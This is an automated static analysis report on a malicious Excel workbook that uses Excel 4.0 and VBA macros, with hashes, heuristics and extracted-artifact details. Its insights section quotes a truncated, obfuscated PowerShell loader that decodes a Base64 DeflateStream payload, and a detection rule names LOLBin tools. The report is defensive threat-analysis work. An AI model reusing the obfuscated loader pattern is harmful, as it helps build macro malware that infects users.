Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 48bc74dbf428f886…

MALICIOUS

Office (OLE)

39.0 KB Created: 2020-04-15 06:58:50 Authoring application: Microsoft Excel
MD5: 3b87568e75847e8e2adedcd303221c67 SHA-1: b9417966c9ba216a20a6b8d110df51a8a0315ffa SHA-256: 48bc74dbf428f8864d27db1c2f1f98b864ab661b7ce97c9831ba015137b65b63
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic

The file contains Excel 4.0 macros that leverage the EXEC function to run PowerShell commands. The script attempts to decode a large Base64 string, which is likely a second-stage payload. The specific PowerShell command executed is 'powershell -arg 'sal uu New-Object; &{(} {(}{[}stRING{]}$VErBoSePRefErENce{)}{[}1,3{]}{+}''X''-JoIN''''{)} {(} uu io.compRESSiON.defLaTEstrEaM{(}{[}system.Io.meMoRysTrEaM{]} {[}conVerT{]}::FROMbASE64StriNG{(} ''ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tb'. The VBA macro also calls 'ExecuteExcel4Macro("RUN(\"RR\")")', suggesting 'RR' might be a macro name or label used to trigger execution.

Heuristics 6

  • ClamAV: Xls.Malware.Agent-7667559-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Agent-7667559-0
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt
820cb8b428caefa499dbdff2fe1d389804ae026ef3c5d9141364f4ba73c78f4f		 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 3061 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 long base64-like blob(s).
macros.bas
444a06ec09cc37d1c706f37bcfb855bee159d5dd3aadd474eb18e65e1bcc8657		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 866 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.